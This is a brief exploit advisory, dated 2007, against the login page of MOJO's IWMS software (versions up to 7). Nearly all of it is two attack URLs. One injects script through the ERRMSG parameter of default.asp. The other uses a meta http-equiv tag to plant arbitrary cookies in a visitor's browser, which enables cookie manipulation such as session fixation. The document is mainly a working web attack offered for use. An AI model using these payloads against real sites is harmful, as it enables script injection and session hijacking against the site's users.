# Exploit Title: MOJO's IWMS Login page XSS and Cookies Manipulation.
# Date: 17/12/2007
# Author: cp77fk4r | Empty0pagE[YOU-KNOW]gmail.com<http://gmail.com>
# Software Link: http://www.mojo.co.il/
# Version: X <= 7
 
# Expl0its:
#[XSS]
-http://[SITE]/upload/default.asp?mode=wrong&ERRMSG=[XSS-Vuln]
 
#-[Cookies Manipulation]
-http://[SITE]/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E
 
# EOF